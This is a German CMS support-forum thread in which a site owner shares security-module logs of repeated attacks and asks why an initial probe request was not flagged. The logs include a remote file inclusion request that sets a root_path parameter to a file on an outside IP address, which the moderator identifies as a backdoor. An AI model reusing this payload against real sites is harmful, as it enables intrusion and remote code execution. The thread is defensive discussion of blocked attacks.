Forum

Moderiert von: stefan, spinne
Forum Index
Support
     Module
     EVA und Sperren
Hilfe anzeigen
Hilfe anzeigen

Autor Druckerfreundliche DarstellungEVA und Sperren
ArthurDent
Registriert: 04.08.2005
Beiträge: 256


Sende eine Private Nachricht an ArthurDent Besuche die Homepage von ArthurDent
Geschrieben: 20.06.2011 15:40

Hallo,

ich bekomme seit einiger Zeit wieder vermehrt Angriffe auf meine Seite gemeldet.
Dabei ist mir folgendes aufgefallen, es fängt immer so an:
- Falscher Scriptaufruf.

Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:00
Die URI die den Fehler ausgelöst hat war:
/is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=test??
REQUEST_URI=/system/article/alltopics.php//master.php?root_path=test??

User information
UNAME:Gast
UID:1

Und danach geht es dann so oder ähnlich weiter:
- [EVA-OUTPUT]This CMS is safe, you should better believe ...

Ausgelöst von der IP Adresse: 173.224.217.126 um 19.06.2011 23:54:03
Die URI die den Fehler ausgelöst hat war:
/is/htdocs/wp1117543_OLHEHTAC3U/www//system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg??
REQUEST_URI=/system/article/alltopics.php//master.php?root_path=http://74.86.162.32//accounts/inc/tmp/crime.jpg??

User information
UNAME:Gast
UID:1

Müsste das EVA-Modul nicht schon denn ersten Aufruf als Fehler/Einbruch melden??

Arthur


---------------------------------------------------
Life is a journey, not a guided tour

If you think technology can solve your problems you don't understand technology and you don't understand your problems.
(Bruce Schneier)

Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect.
(Linus Torvalds)
---------------------------------------------------
Linux: Debian 2.6.37
Datenbank: MySQL - 5.5.22
Apache: 2.2
PHP: 5.3.27
OPN: 2.5.7 (Revision 6747)
Zitieren Druckerfreundliche Darstellung nach oben
stefan
Wohnort: Münster


Sende eine Private Nachricht an stefan
ICQ 		Geschrieben: 20.06.2011 19:36

Kann man etwas drüber diskutieren. Das erste ist zwar "vermutlich" ein Test ob der Zugriff möglich ist, allerdings ist das nicht zwingend so.

Bei dem Zweiten ist das eindeutig. Das File das dort eingeschleust werden soll ist bzw war ne "Backdoor".

Siehst du das anderes?


Zitieren Druckerfreundliche Darstellung nach oben
ArthurDent
Registriert: 04.08.2005
Beiträge: 256


Sende eine Private Nachricht an ArthurDent Besuche die Homepage von ArthurDent
Geschrieben: 20.06.2011 21:27

Hi Stefan,

das EVA den zweiten "Angriff" abgehalten hat, finde ich gut und auch richtig.
Darüber braucht man gar nicht zu diskutieren.

Es hat mich nur gewundert das der "erste" Test durchgeht.
Diese Art des Test und danach so ungefähr 10-30 Angriffe habe ich in letzter Zeit jeden 2-3 Tag.

Das nervt einfach nur noch.


Danke für die schnelle Antwort,
Arthur


---------------------------------------------------
Life is a journey, not a guided tour

If you think technology can solve your problems you don't understand technology and you don't understand your problems.
(Bruce Schneier)

Really, I'm not out to destroy Microsoft. That will just be a completely unintentional side effect.
(Linus Torvalds)
---------------------------------------------------
Linux: Debian 2.6.37
Datenbank: MySQL - 5.5.22
Apache: 2.2
PHP: 5.3.27
OPN: 2.5.7 (Revision 6747)
Zitieren Druckerfreundliche Darstellung nach oben
sortieren nach

Hilfe anzeigen
Hilfe anzeigen
Vorheriges Thema:  kurz-url/ short-url
Nächstes Thema:  PIRC

Gehe zu:

Benutzername:
 
Sicherheits-Code
Sicherheits-Code
Neu laden